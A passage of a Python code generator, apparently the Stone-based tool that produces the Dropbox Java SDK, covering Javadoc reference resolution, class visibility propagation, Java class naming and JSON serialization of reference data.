# pad the end with None's
context_parts += [None, ] * (max_parts - len(context_parts))
parts = [(orig or context) for orig, context in zip(parts, context_parts)]
if None in parts:
return None
else:
return '.'.join(parts)
if tag == 'route':
fq_name = resolve_fq_name(val.replace(":", "_v"), 2)
return self._refs.route(fq_name) if fq_name else None
elif tag == 'type':
fq_name = resolve_fq_name(val, 2)
return self._refs.data_type(fq_name) if fq_name else None
elif tag == 'field':
fq_name = resolve_fq_name(val, 3)
return self._refs.field(fq_name) if fq_name else None
elif tag == 'link':
return None
elif tag == 'val':
return None
else:
assert False, 'Unsupported tag (:{}:`{}`)'.format(tag, val)
def _javadoc_route_ref(self, route_ref, builder=False):
assert isinstance(route_ref, RouteReference), repr(route_ref)
if self._g.args.data_types_only:
return '{@code %s}' % route_ref.url_path
if builder and route_ref.has_builder:
method_name = route_ref.builder_method
method_args = []
else:
method_name = route_ref.method
method_args = [
self.resolved_class(c, generics=False) for c in route_ref.method_arg_classes
]
if method_args:
return self.fmt('{@link %s#%s(%s)}', route_ref.java_class, method_name, ','.join(method_args))
else:
return self.fmt('{@link %s#%s}', route_ref.java_class, method_name)
def _javadoc_data_type_ref(self, data_type_ref, builder=False):
assert isinstance(data_type_ref, DataTypeReference), repr(data_type_ref)
if builder and data_type_ref.has_builder:
java_class = data_type_ref.builder_class
else:
java_class = data_type_ref.java_class
return self.fmt('{@link %s}', java_class)
def _javadoc_field_ref(self, field_ref):
assert isinstance(field_ref, FieldReference), repr(field_ref)
# Address issue T76930:
#
# We want to avoid referencing to `RouteArg` struct classes that are never used in our
# public route methods. When we generate routes with struct args, we generally do it like
# so:
#
# private RouteResult routeName(RouteArg);
# public RouteResult routeName(field1, field2, field3);
# public RouteResultBuilder routeNameBuilder(field1, field2, field3);
#
        # So if the field's containing data type is a struct, make sure the struct is
        # public. Otherwise, try to find out if that struct is uniquely used as a route
        # argument and make the Javadoc reference point to the route method instead of
        # the struct class.
if field_ref.route_refs and not self._g.args.data_types_only:
# the struct should not appear anywhere else besides as a route argument
return 'the {{@code {}}} argument to {}'.format(
field_ref.param_name,
oxford_comma_list([
self._javadoc_route_ref(route_ref)
for route_ref in field_ref.route_refs
], conjunction='or'),
)
containing_data_type_ref = field_ref.containing_data_type_ref
# can't reference a package-private data type.
assert containing_data_type_ref.visibility.is_visible, repr(field_ref)
# fallback to standard ref
return self.fmt(
'{@link %s#%s}',
containing_data_type_ref.java_class,
field_ref.static_instance or field_ref.getter_method
)
class JavaApi:
def __init__(self, api, generator_args):
self.stone_api = api
self._args = generator_args
self._containing_data_types = self._get_containing_data_types(api)
self._namespaces_by_route = self._get_namespaces_by_route(api)
self._data_types_with_exception = self._get_data_types_with_exception(api)
if generator_args.data_types_only:
self._data_type_visibility = defaultdict(lambda: Visibility.PUBLIC)
self._serializer_visibility = defaultdict(lambda: Visibility.PUBLIC)
self._client_data_types = {
data_type
for namespace in api.namespaces.values()
for data_type in namespace.data_types
}
else:
self._data_type_visibility = self._resolve_data_type_visibility(api)
self._serializer_visibility = self._resolve_serializer_visibility(api)
# data types required for this specific client. We avoid generating data types that aren't
# required by the client.
self._client_data_types = {
data_type for data_type, visibility in self._data_type_visibility.items()
if visibility.is_visible
}
@staticmethod
def _get_containing_data_types(api):
mapping = {}
for namespace in api.namespaces.values():
for data_type in namespace.data_types:
for field in data_type.fields:
mapping[field] = data_type
return mapping
@staticmethod
def _get_namespaces_by_route(api):
mapping = {}
for namespace in api.namespaces.values():
for route in namespace.routes:
mapping[route] = namespace
return mapping
@staticmethod
def _get_data_types_with_exception(api):
data_types = set()
for namespace in api.namespaces.values():
for route in namespace.routes:
if is_user_defined_type(route.error_data_type):
data_types.add(route.error_data_type)
return data_types
@staticmethod
def _resolve_data_type_visibility(api):
visibility = defaultdict(lambda: Visibility.NONE)
def update(data_type, new_visibility):
visibility[data_type] = max(visibility[data_type], new_visibility)
def update_by_reference(data_type, namespace):
if data_type.namespace == namespace:
update(data_type, Visibility.PACKAGE)
else:
update(data_type, Visibility.PUBLIC)
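# Illustrative effect: a data type referenced only from within its own namespace may stay
# package-private, while any cross-namespace reference forces it to PUBLIC.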
# Calculate initial visibility state based on routes that use our data types.
for namespace in api.namespaces.values():
for route in namespace.routes:
arg = get_underlying_type(route.arg_data_type)
result = get_underlying_type(route.result_data_type)
error = get_underlying_type(route.error_data_type)
if is_user_defined_type(result):
update(result, Visibility.PUBLIC)
if is_user_defined_type(error):
update(error, Visibility.PUBLIC)
if is_user_defined_type(arg):
# Could be something like List(FooArg), in which case, we just make FooArg public.
if arg != route.arg_data_type:
update(arg, Visibility.PUBLIC)
elif is_union_type(arg):
update(arg, Visibility.PUBLIC)
elif is_struct_type(arg):
# We explode structs so that their fields are the arguments to the route
# method. We have to construct an instance of the arg object from our route
# method, so we might be able to make the arg class package-private if it
# isn't referenced anywhere else.
update_by_reference(arg, namespace)
for field in arg.all_fields:
field_data_type = get_underlying_type(field.data_type)
if is_user_defined_type(field_data_type):
update(field_data_type, Visibility.PUBLIC)
# Now iterate repeatedly, cascading the visibility out to other required data types as necessary.
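# Hypothetical example of the cascade: if struct A is PUBLIC and has a field of type B,
# B is promoted on the next pass; B's parent type or enumerated subtypes may then be
# promoted on the pass after that. The loop terminates once a full pass changes nothing.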
prev_state = None
cur_state = visibility.copy()
while prev_state != cur_state:
for namespace in api.namespaces.values():
if namespace.doc is not None:
data_types = parse_data_types_from_doc_ref(api, namespace.doc, namespace.name,
ignore_missing_entries=True)
for d in data_types:
update_by_reference(d, namespace)
for data_type in namespace.data_types:
if not visibility[data_type].is_visible:
continue
if data_type.doc is not None:
data_types = parse_data_types_from_doc_ref(api, data_type.doc, namespace.name,
ignore_missing_entries=True)
for d in data_types:
update_by_reference(d, namespace)
for field in data_type.all_fields:
field_data_type = get_underlying_type(field.data_type)
# if this data type is public, then all its fields must be public as well
# to ensure they are properly exposed to the user
if is_user_defined_type(field_data_type):
if visibility[data_type] == Visibility.PUBLIC:
update(field_data_type, Visibility.PUBLIC)
else:
# otherwise, just update visibility so this class can properly reference
# the field data type
update_by_reference(field_data_type, namespace)
if field.doc is not None:
data_types = parse_data_types_from_doc_ref(api, field.doc, namespace.name,
ignore_missing_entries=True)
for d in data_types:
update_by_reference(d, namespace)
if is_struct_type(data_type):
if data_type.parent_type:
if visibility[data_type] == Visibility.PUBLIC:
update(data_type.parent_type, Visibility.PUBLIC)
else:
# subclasses need access to their parent class
update_by_reference(data_type.parent_type, namespace)
# parents need access to their enumerated subtype classes. If the parent is
# public, then make the subclasses public too for casting.
if data_type.has_enumerated_subtypes():
for subtype in data_type.get_enumerated_subtypes():
if visibility[data_type] == Visibility.PUBLIC:
update(subtype.data_type, Visibility.PUBLIC)
else:
update_by_reference(subtype.data_type, namespace)
prev_state = cur_state
cur_state = visibility.copy()
return visibility
@staticmethod
def _resolve_serializer_visibility(api):
visibility = defaultdict(lambda: Visibility.NONE)
def update(data_type, new_visibility):
visibility[data_type] = max(visibility[data_type], new_visibility)
def update_by_reference(data_type, namespace):
if data_type.namespace == namespace:
update(data_type, Visibility.PACKAGE)
else:
update(data_type, Visibility.PUBLIC)
# Calculate initial visibility state based on routes that use our data types.
for namespace in api.namespaces.values():
for route in namespace.routes:
for data_type in (route.arg_data_type, route.result_data_type, route.error_data_type):
data_type = get_underlying_type(data_type)
if is_user_defined_type(data_type):
update_by_reference(data_type, namespace)
# Now iterate repeatedly, cascading the visibility out to other required data types as necessary.
prev_state = None
cur_state = visibility.copy()
while prev_state != cur_state:
for namespace in api.namespaces.values():
if namespace.doc is not None:
data_types = parse_data_types_from_doc_ref(api, namespace.doc, namespace.name,
ignore_missing_entries=True)
for d in data_types:
update_by_reference(d, namespace)
for data_type in namespace.data_types:
if not visibility[data_type].is_visible:
continue
if data_type.doc is not None:
data_types = parse_data_types_from_doc_ref(api, data_type.doc, namespace.name,
ignore_missing_entries=True)
for d in data_types:
update_by_reference(d, namespace)
for field in data_type.all_fields:
field_data_type = get_underlying_type(field.data_type)
if is_user_defined_type(field_data_type):
update_by_reference(field_data_type, namespace)
if field.doc is not None:
data_types = parse_data_types_from_doc_ref(api, field.doc, namespace.name,
ignore_missing_entries=True)
for d in data_types:
update_by_reference(d, namespace)
# parents need access to their enumerated subtype serializers
if is_struct_type(data_type) and data_type.has_enumerated_subtypes():
for subtype in data_type.get_enumerated_subtypes():
update_by_reference(subtype.data_type, namespace)
prev_state = cur_state
cur_state = visibility.copy()
return visibility
@staticmethod
def get_spec_filename(element):
assert isinstance(element, StoneType), repr(element)
assert hasattr(element, '_ast_node'), repr(element)
return os.path.basename(element._ast_node.path)
def get_spec_filenames(self, element):
assert isinstance(element, StoneType), repr(element)
filenames = OrderedDict() # ordered set
if isinstance(element, ApiNamespace):
for child in chain(element.data_types, element.routes):
filenames[self.get_spec_filename(child)] = None
else:
filenames[self.get_spec_filename(element)] = None
return filenames.keys()
@staticmethod
def requires_validation(data_type):
assert isinstance(data_type, DataType), repr(data_type)
if is_list_type(data_type) or is_map_type(data_type):
return True
elif is_numeric_type(data_type):
return any(r is not None for r in (
data_type.min_value,
data_type.max_value,
))
elif is_string_type(data_type):
return any(r is not None for r in (
data_type.min_length,
data_type.max_length,
data_type.pattern,
))
else:
return False
def is_collapsible(self, data_type):
assert isinstance(data_type, DataType), repr(data_type)
return is_struct_type(data_type) and not data_type.has_enumerated_subtypes()
@staticmethod
def param_name(stone_elem):
assert isinstance(stone_elem, (ApiNamespace, Field)), repr(stone_elem)
if isinstance(stone_elem, UnionField):
return camelcase(stone_elem.name + '_value')
else:
return camelcase(stone_elem.name)
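# e.g. (hypothetical fields): a union field named "path_lookup" becomes "pathLookupValue",
# while a struct field named "file_name" becomes "fileName".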
def stone_fq_name(self, stone_elem, containing_data_type=None):
assert isinstance(stone_elem, StoneType), repr(stone_elem)
# When the containing data type of a field is part of an inheritance hierarchy, field
# references can be ambiguous. This is a big problem with unions since we copy all the parent fields
# into the child union in Java. So the same field may appear multiple times, but in
# different classes along the Stone chain of inheritance.
assert isinstance(containing_data_type, DataType) or containing_data_type is None, repr(containing_data_type)
if isinstance(stone_elem, ApiNamespace):
parts = [stone_elem.name]
elif isinstance(stone_elem, DataType):
if is_user_defined_type(stone_elem):
parts = [stone_elem.namespace.name, stone_elem.name]
else:
parts = [stone_elem.name]
elif isinstance(stone_elem, ApiRoute):
namespace = self.route_namespace(stone_elem)
parts = [namespace.name, format_func_name(stone_elem)]
elif isinstance(stone_elem, Field):
containing_data_type = containing_data_type or self.field_containing_data_type(stone_elem)
namespace = containing_data_type.namespace
parts = [namespace.name, containing_data_type.name, stone_elem.name]
else:
raise ValueError("Unsupported Stone type: %s" % type(stone_elem))
return '.'.join(parts)
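# Examples of fully-qualified Stone names (hypothetical): a namespace -> "files", a data
# type -> "files.Metadata", a field -> "files.Metadata.name", and a route -> roughly
# "files.list_folder" (the exact route segment comes from format_func_name).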
def namespace_getter_method(self, namespace):
assert isinstance(namespace, ApiNamespace), repr(namespace)
return camelcase(namespace.name)
def field_getter_method(self, field):
assert isinstance(field, Field), repr(field)
containing_data_type = self._containing_data_types[field]
if is_struct_type(containing_data_type):
return camelcase('get_' + field.name)
elif is_union_type(containing_data_type) and self.has_value(field):
return camelcase('get_' + field.name + '_value')
else:
return None
def field_enum_name(self, field):
assert isinstance(field, Field), repr(field)
containing_data_type = self._containing_data_types[field]
if self.is_enum(containing_data_type):
return allcaps(field.name)
return None
def field_tag_enum_name(self, field):
assert isinstance(field, Field), repr(field)
containing_data_type = self._containing_data_types[field]
if is_union_type(containing_data_type):
return allcaps(field.name)
return None
def field_tag_match_method_name(self, field):
assert isinstance(field, Field), repr(field)
containing_data_type = self._containing_data_types[field]
assert is_union_type(containing_data_type), repr(field)
return camelcase('is_' + field.name)
def field_static_instance(self, field):
assert isinstance(field, Field), repr(field)
containing_data_type = self._containing_data_types[field]
if is_union_type(containing_data_type):
if self.is_enum(containing_data_type):
return self.field_enum_name(field)
elif not self.has_value(field):
return allcaps(field.name)
return None
def field_factory_method(self, field):
assert isinstance(field, Field), repr(field)
containing_data_type = self._containing_data_types[field]
if is_union_type(containing_data_type) and self.has_value(field):
return camelcase(field.name)
return None
def field_builder_method(self, field):
assert isinstance(field, Field), repr(field)
containing_data_type = self._containing_data_types[field]
if field in containing_data_type.all_optional_fields:
return camelcase('with_' + field.name)
return None
def is_java_primitive(self, data_type):
return self.java_class(data_type, generics=False).name[0].islower()
@staticmethod
def is_enum(data_type):
assert isinstance(data_type, DataType), repr(data_type)
if is_union_type(data_type):
return all(is_void_type(f.data_type) for f in data_type.all_fields)
else:
return False
@staticmethod
def has_value(field):
assert isinstance(field, Field), repr(field)
return not is_void_type(field.data_type)
def field_is_optional(self, field):
assert isinstance(field, Field), repr(field)
containing_data_type = self._containing_data_type(field)
return field in containing_data_type.all_optional_fields
def field_is_required(self, field):
assert isinstance(field, Field), repr(field)
containing_data_type = self._containing_data_type(field)
return field in containing_data_type.all_required_fields
def url_path(self, route):
"""
Server URL path associated with this route.
"""
assert isinstance(route, ApiRoute), repr(route)
return '2/{}/{}'.format(self._namespaces_by_route[route].name, format_func_name(route))
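# e.g. a route named "list_folder" in the "files" namespace yields "2/files/list_folder"
# (hypothetical names; the route segment comes from format_func_name).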
@staticmethod
def has_arg(route):
assert isinstance(route, ApiRoute), repr(route)
return not is_void_type(route.arg_data_type)
@staticmethod
def has_result(route):
assert isinstance(route, ApiRoute), repr(route)
return not is_void_type(route.result_data_type)
@staticmethod
def has_error(route):
assert isinstance(route, ApiRoute), repr(route)
if is_void_type(route.error_data_type):
return False
else:
# we only support user-defined error types
assert is_user_defined_type(route.error_data_type), repr(route)
return True
@staticmethod
def request_style(route):
assert isinstance(route, ApiRoute), repr(route)
return route.attrs.get('style', 'rpc')
@staticmethod
def auth_style(route):
assert isinstance(route, ApiRoute), repr(route)
return route.attrs.get('auth', 'user')
@staticmethod
def route_host(route):
assert isinstance(route, ApiRoute), repr(route)
return route.attrs.get('host', 'api')
def has_builder(self, stone_elem):
assert isinstance(stone_elem, (ApiRoute, DataType)), repr(stone_elem)
if isinstance(stone_elem, DataType):
data_type = stone_elem
return is_struct_type(data_type) and len(data_type.all_optional_fields) > 1
else:
route = stone_elem
return self.request_style(route) == 'download' or self.has_builder(route.arg_data_type)
@staticmethod
def route_method(route):
assert isinstance(route, ApiRoute), repr(route)
return camelcase(format_func_name(route))
@staticmethod
def route_builder_method(route):
assert isinstance(route, ApiRoute), repr(route)
return camelcase(format_func_name(route) + '_builder')
@staticmethod
def namespace_package(namespace, base_package):
return base_package + '.' + namespace.name.replace('_', '').lower()
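# e.g. namespace "team_log" under base package "com.dropbox.core.v2" becomes
# "com.dropbox.core.v2.teamlog" (underscores stripped, lowercased).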
def java_class(self, stone_elem, boxed=False, generics=True):
assert isinstance(stone_elem, (ApiNamespace, ApiRoute, DataType, Field)), repr(stone_elem)
base_package = self._args.package
if isinstance(stone_elem, ApiNamespace):
namespace = stone_elem
package = self.namespace_package(namespace, base_package)
prefix = self._args.requests_classname_prefix or self._args.client_class
return JavaClass(package + '.' + classname('{}_{}_Requests'.format(prefix, namespace.name)))
elif isinstance(stone_elem, ApiRoute):
route = stone_elem
return self.java_class(self._namespaces_by_route[route])
elif isinstance(stone_elem, Field):
field = stone_elem
return self.java_class(field.data_type, boxed=boxed, generics=generics)
else:
data_type = stone_elem
if is_nullable_type(data_type):
return self.java_class(data_type.data_type, boxed=True, generics=generics)
elif is_user_defined_type(data_type):
package = self.namespace_package(data_type.namespace, base_package)
return JavaClass(package + '.' + classname(data_type.name))
else:
generic_classes = []
if generics and is_list_type(data_type):
generic_classes = [self.java_class(data_type.data_type, boxed=True, generics=True)]
elif generics and is_map_type(data_type):
generic_classes = [self.java_class(data_type.key_data_type, boxed=True), self.java_class(
data_type.value_data_type, boxed=True, generics=True)]
type_map = _TYPE_MAP_BOXED if boxed else _TYPE_MAP_UNBOXED
return JavaClass(type_map[data_type.name], generics=generic_classes)
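# Sketch of the builtin mapping (assuming standard _TYPE_MAP entries): with generics=True,
# List(UInt64) would resolve to java.util.List<java.lang.Long>, while an unboxed UInt64
# would resolve to the primitive long.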
def builder_class(self, stone_elem):
assert isinstance(stone_elem, (ApiRoute, DataType)), repr(stone_elem)
assert self.has_builder(stone_elem), repr(stone_elem)
if isinstance(stone_elem, ApiRoute):
route = stone_elem
if ',' in self.auth_style(route):
# Use prefix here because multiple builders may be generated
# if the endpoint has multiple auth types
prefix = (self._args.requests_classname_prefix or self._args.client_class) + "_"
else:
prefix = ""
package = self.java_class(route).package
return JavaClass(package + '.' + classname('{}{}_builder'.format(prefix, format_func_name(route))))
else:
data_type = stone_elem
assert is_user_defined_type(data_type), repr(data_type)
data_type_class = self.java_class(data_type)
# nested static class
return JavaClass(data_type_class.fq + '.Builder')
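# e.g. a struct class com.example.team.Foo yields the nested builder class
# com.example.team.Foo.Builder (illustrative package name).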
def serializer_class(self, data_type):
assert isinstance(data_type, DataType), repr(data_type)
data_type_class = self.java_class(data_type)
return JavaClass(data_type_class.fq + '.Serializer')
def exception_class(self, element):
assert isinstance(element, (DataType, ApiRoute)), repr(element)
if isinstance(element, DataType):
data_type = element
assert self.data_type_has_exception(data_type), repr(data_type)
return JavaClass(self.java_class(element).fq + 'Exception')
else:
route = element
if self.has_error(route):
return self.exception_class(route.error_data_type)
else:
return JavaClass('com.dropbox.core.DbxApiException')
def route_exception_class(self, route):
assert isinstance(route, ApiRoute), repr(route)
if self.has_error(route):
error = route.error_data_type
error_class = self.java_class(error)
return JavaClass(error_class.fq + 'Exception')
else:
return JavaClass('com.dropbox.core.DbxApiException')
def route_throws_classes(self, route):
assert isinstance(route, ApiRoute), repr(route)
exc_classes = []
if self.request_style(route) != 'upload':
# upload routes don't receive the server response in the method call. The request is
# issued later through the Uploader class
route_specific_exc_class = self.route_exception_class(route)
exc_classes.append(route_specific_exc_class)
exc_classes.append(JavaClass('com.dropbox.core.DbxException'))
return exc_classes
def route_uploader_class(self, route):
assert isinstance(route, ApiRoute), repr(route)
return JavaClass(
self.java_class(route).package + '.' + classname(format_func_name(route) + '_Uploader')
)
def route_downloader_class(self, route):
assert isinstance(route, ApiRoute), repr(route)
assert self.request_style(route) == 'download', repr(route)
return JavaClass('com.dropbox.core.DbxDownloader', generics=(
self.java_class(route.result_data_type, boxed=True),
))
def is_used_by_client(self, data_type):
assert isinstance(data_type, DataType), repr(data_type)
return data_type in self._client_data_types
def data_type_has_exception(self, data_type):
assert isinstance(data_type, DataType), repr(data_type)
assert is_user_defined_type(data_type), repr(data_type)
return data_type in self._data_types_with_exception
def field_containing_data_type(self, field):
assert isinstance(field, Field), repr(field)
assert field in self._containing_data_types, repr(field)
return self._containing_data_types[field]
def route_namespace(self, route):
assert isinstance(route, ApiRoute), repr(route)
assert route in self._namespaces_by_route, repr(route)
return self._namespaces_by_route[route]
def _lookup_data_type(self, fq_name):
assert isinstance(fq_name, str), repr(fq_name)
assert '.' in fq_name, repr(fq_name)
namespace_name, data_type_name = split_stone_name(fq_name, max_parts=2)
namespace = self.stone_api.namespaces.get(namespace_name)
if namespace:
for data_type in namespace.data_types:
if data_type.name == data_type_name:
return data_type
def data_type_visibility(self, data_type):
assert isinstance(data_type, DataType), repr(data_type)
return self._data_type_visibility[data_type]
def update_data_type_visibility(self, data_type_fq_name, visibility):
data_type = self._lookup_data_type(data_type_fq_name)
if data_type:
self._data_type_visibility[data_type] = max(
self._data_type_visibility[data_type], visibility
)
def serializer_visibility(self, data_type):
assert isinstance(data_type, DataType), repr(data_type)
visibility = self._serializer_visibility[data_type]
if not visibility.is_visible and self.data_type_visibility(data_type).is_visible:
# if the data type itself is visible, force its serializer to be at least privately
# visible, since toString(..) depends on the serializer
return Visibility.PRIVATE
return visibility
def update_serializer_visibility(self, data_type_fq_name, visibility):
data_type = self._lookup_data_type(data_type_fq_name)
if data_type:
self._serializer_visibility[data_type] = max(
self._serializer_visibility[data_type], visibility
)
def mark_data_type_as_used(self, data_type):
self._client_data_types.add(data_type)
class JavaReferences:
def __init__(self, j):
self.j = j
self.data_types = {}
self.routes = {}
self.fields = {}
self._initialize()
def load(self, f):
data = json.load(f, object_hook=JavaReference.from_json)
# resolve all name references
for route in data['routes'].values():
if route.error_ref:
route.error_ref = data['data_types'][route.error_ref]
for field in data['fields'].values():
field.containing_data_type_ref = data['data_types'][field.containing_data_type_ref]
field.route_refs = tuple(
data['routes'][route_ref]
for route_ref in field.route_refs
)
# now update our existing state
self._update(data)
def _update(self, data):
# do data types first, since they are referenced by other types
for key, data_type in data['data_types'].items():
if key not in self.data_types:
self.data_types[key] = data_type
else:
self.data_types[key].update_visibility(data_type.visibility)
self.data_types[key].update_serializer_visibility(data_type.serializer_visibility)
# routes reference their error types
for key, route in data['routes'].items():
if key not in self.routes:
# update error_ref
if route.error_ref:
route.error_ref = self.data_types[route.error_ref.fq_name]
self.routes[key] = route
# fields have data type and route refs
for key, field in data['fields'].items():
if key not in self.fields:
# update refs
field.containing_data_type_ref = self.data_types[field.containing_data_type_ref.fq_name]
field.route_refs = tuple(
self.routes[route_ref.fq_name]
for route_ref in field.route_refs
)
self.fields[key] = field
else:
# update existing route refs
merged_route_refs = list(self.fields[key].route_refs)
for route_ref in field.route_refs:
route_ref = self.routes[route_ref.fq_name]
if route_ref not in merged_route_refs:
merged_route_refs.append(route_ref)
self.fields[key].route_refs = tuple(merged_route_refs)
# need to update our JavaApi with the new visibilities
for key in data['data_types']:
# get merged data type ref for our loaded data types
data_type_ref = self.data_types[key]
self.j.update_data_type_visibility(data_type_ref.fq_name, data_type_ref.visibility)
self.j.update_serializer_visibility(data_type_ref.fq_name, data_type_ref.serializer_visibility)
def serialize(self, f):
return json.dump({
'data_types': self.data_types,
'routes': self.routes,
'fields': self.fields,
}, f, default=self._as_json)
@staticmethod
def _as_json(obj):
if isinstance(obj, JavaReference):
return obj._as_json()
elif isinstance(obj, Visibility):
return obj.name
elif isinstance(obj, JavaClass):
return str(obj)
else:
raise TypeError(repr(obj) + " is not JSON serializable")
def data_type(self, data_type):
j = self.j
if isinstance(data_type, DataType):
name = j.stone_fq_name(data_type)
else:
assert isinstance(data_type, str), repr(data_type)
name = data_type
assert '.' in name, "Must use fully-qualified stone name: %s" % name
return self.data_types.get(name)
def field(self, field, containing_data_type=None):
j = self.j
if isinstance(field, Field):
name = j.stone_fq_name(field, containing_data_type)
else:
# we expect fully-qualified names for string field references
assert containing_data_type is None, repr(field)
assert isinstance(field, str), repr(field)
name = field
assert '.' in name, "Must use fully-qualified stone name: %s" % name
return self.fields.get(name)
def route(self, route):
j = self.j
if isinstance(route, ApiRoute):
name = j.stone_fq_name(route)
else:
assert isinstance(route, str), repr(route)
name = route
assert '.' in name, "Must use fully-qualified stone name: %s" % name
return self.routes.get(name)
def _initialize(self):
j = self.j
# Data types
for namespace in j.stone_api.namespaces.values():
for data_type in namespace.data_types:
self.data_types[j.stone_fq_name(data_type)] = DataTypeReference(j, data_type)
# Routes
route_refs_by_field = defaultdict(list)
for namespace in j.stone_api.namespaces.values():
for route in namespace.routes:
error_ref = None
if is_user_defined_type(route.error_data_type):
error_ref = self.data_types[j.stone_fq_name(route.error_data_type)]
route_ref = RouteReference(j, route, error_ref)
self.routes[j.stone_fq_name(route)] = route_ref
# keep track of fields referenced by routes (required by Javadoc for overloaded methods)
if route_ref.is_method_overloaded:
for field in route.arg_data_type.all_fields:
route_refs_by_field[field].append(route_ref)
# Fields
for namespace in j.stone_api.namespaces.values():
for data_type in namespace.data_types:
data_type_ref = self.data_types[j.stone_fq_name(data_type)]
# Note that we may have duplicate references for the same field. This happens when
# there is inheritance in the struct or union. We want to make sure that both
# :field:`Child.field` and :field:`Parent.field` references work in Stone doc.
for field in data_type.all_fields:
field_fq_name = j.stone_fq_name(field, data_type)
self.fields[field_fq_name] = FieldReference(
j, field, field_fq_name, data_type_ref, route_refs_by_field.get(field, ())
)
class JavaReference:
def __init__(self, fq_name):
assert isinstance(fq_name, str), repr(fq_name)
self.fq_name = fq_name
def __repr__(self):
return '{}({})'.format(type(self).__name__, self.__dict__)
def __str__(self):
return '{}({})'.format(type(self).__name__, self.fq_name)
def _as_json(self):
dct = {}
for k, v in self.__dict__.items():
# avoid cyclic reference issues
if isinstance(v, JavaReference):
dct[k] = v.fq_name
elif isinstance(v, Sequence) and all(isinstance(e, JavaReference) for e in v):
dct[k] = [
e.fq_name if isinstance(e, JavaReference) else e
for e in v
]
elif isinstance(v, JavaClass):
dct[k] = str(v)
elif isinstance(v, Sequence) and all(isinstance(e, JavaClass) for e in v):
dct[k] = [str(c) for c in v]
else:
dct[k] = v
dct['_type'] = type(self).__name__
return dct
def _from_json(self, obj):
obj.pop('_type')
self.__dict__.update(obj)
@classmethod
def from_json(cls, obj):
if '_type' in obj:
ref_type = obj['_type']
module = sys.modules[__name__]
assert hasattr(module, ref_type), repr(ref_type)
ref_cls = getattr(module, ref_type)
assert issubclass(ref_cls, cls), repr(ref_cls)
ref = cls.__new__(ref_cls)
ref._from_json(obj)
return ref
return obj
class JavaClassReference(JavaReference):
def __init__(self, name, java_class, visibility=Visibility.NONE):
assert isinstance(java_class, JavaClass), repr(java_class)
assert isinstance(visibility, Visibility), repr(visibility)
super().__init__(name)
self.java_class = java_class
self.visibility = visibility
def update_visibility(self, visibility):
self.visibility = max(visibility, self.visibility)
def _from_json(self, obj):
self.java_class = JavaClass.from_str(obj.pop('java_class'))
self.visibility = Visibility.from_name(obj.pop('visibility'))
super()._from_json(obj)
class RouteReference(JavaClassReference):
def __init__(self, j, route, error_ref):
assert isinstance(route, ApiRoute), repr(route)
super().__init__(
j.stone_fq_name(route),
j.java_class(route),
Visibility.PUBLIC
)
self.namespace_name = j.route_namespace(route).name
self.method = j.route_method(route)
self.has_builder = j.has_builder(route)
self.builder_method = j.route_builder_method(route) if self.has_builder else None
self.error_ref = error_ref
self.url_path = j.url_path(route)
if is_struct_type(route.arg_data_type):
self.is_method_overloaded = (
any(route.arg_data_type.all_optional_fields) and not j.has_builder(route.arg_data_type)
)
if self.is_method_overloaded:
fields = route.arg_data_type.all_fields
else:
fields = route.arg_data_type.all_required_fields
self.method_arg_classes = tuple(j.java_class(field) for field in fields)
else:
self.method_arg_classes = ()
self.is_method_overloaded = False
def _from_json(self, obj):
self.method_arg_classes = tuple(
JavaClass.from_str(c) for c in obj.pop('method_arg_classes')
)
super()._from_json(obj)
class DataTypeReference(JavaClassReference):
def __init__(self, j, data_type):
assert isinstance(data_type, DataType), repr(data_type)
super().__init__(
j.stone_fq_name(data_type),
j.java_class(data_type),
visibility=j.data_type_visibility(data_type)
)
self.has_builder = j.has_builder(data_type)
self.builder_class = j.builder_class(data_type) if self.has_builder else None
self.serializer_visibility = j.serializer_visibility(data_type)
def update_serializer_visibility(self, visibility):
self.serializer_visibility = max(self.serializer_visibility, visibility)
def _from_json(self, obj):
self.builder_class = JavaClass.from_str(obj.pop('builder_class')) if obj['builder_class'] else None
self.serializer_visibility = Visibility.from_name(obj.pop('serializer_visibility'))
super()._from_json(obj)
class FieldReference(JavaReference):
def __init__(self, j, field, fq_name, containing_data_type_ref, route_refs):
assert isinstance(field, Field), repr(field)
assert isinstance(containing_data_type_ref, DataTypeReference), repr(containing_data_type_ref)
assert isinstance(route_refs, Sequence), repr(route_refs)
assert all(isinstance(r, RouteReference) for r in route_refs), repr(route_refs)
super().__init__(fq_name)
self.param_name = j.param_name(field)
self.static_instance = j.field_static_instance(field)
self.getter_method = j.field_getter_method(field)
self.containing_data_type_ref = containing_data_type_ref
self.route_refs = route_refs
class JavaCodeGenerationInstance:
"""
Java code generation instance for a particular Stone tree (:class:`stone.api.Api`).
:ivar :class:`GeneratorContext` ctx: context for current generation
"""
def __init__(self, g, api):
self.api = api
self.g = g
self.j = JavaApi(api, self.g.args)
# some classes are unused, but we still want them to be generated
self._mark_special_unused_classes()
self.refs = JavaReferences(self.j)
# JavaClassWriter, created with self.class_writer(..)
self.w = None
@contextmanager
def class_writer(self, stone_type_or_class, package_doc=None):
assert isinstance(stone_type_or_class, (StoneType, JavaClass)), repr(stone_type_or_class)
if isinstance(stone_type_or_class, JavaClass):
java_class = stone_type_or_class
stone_element = None
else:
java_class = self.j.java_class(stone_type_or_class)
stone_element = stone_type_or_class
with JavaClassWriter(self.g, self.j, self.refs, java_class, stone_element=stone_element,
package_doc=package_doc) as w:
assert self.w is None, self.w
self.w = w
yield w
self.w = None
def generate_all(self):
self.update_javadoc_refs()
self.generate_client()
for namespace in self.api.namespaces.values():
self.generate_namespace(namespace)
def generate_data_types(self):
for namespace in self.api.namespaces.values():
for data_type in namespace.data_types:
self.generate_data_type(data_type)
def update_javadoc_refs(self):
javadoc_refs_path = self.g.args.javadoc_refs
if javadoc_refs_path is None:
return
# load existing file and merge it with our current state
if os.path.exists(javadoc_refs_path):
with open(javadoc_refs_path) as f:
self.refs.load(f)
# save our updated state back to the file
with open(javadoc_refs_path, 'w') as f:
self.refs.serialize(f)
def generate_client(self):
j = self.j
namespaces = [
ns for ns in self.api.namespaces.values()
if ns.routes
]
client_class = JavaClass(self.g.args.package + '.' + self.g.args.client_class)
with self.class_writer(client_class) as w:
w.importer.add_imports(*[
j.java_class(namespace) for namespace in namespaces
])
w.importer.add_imports('com.dropbox.core.v2.DbxRawClientV2')
w.write_imports()
w.out('')
w.javadoc(self.g.args.client_javadoc or "")
with w.class_block(client_class):
w.out('protected final DbxRawClientV2 _client;')
w.out('')
for namespace in namespaces:
w.out('private final %s %s;', j.java_class(namespace), j.param_name(namespace))
w.out('')
w.javadoc(
"""
For internal use only.
""",
params=(('_client', 'Raw v2 client to use for issuing requests'),)
)
with w.block('protected %s(DbxRawClientV2 _client)', client_class.name):
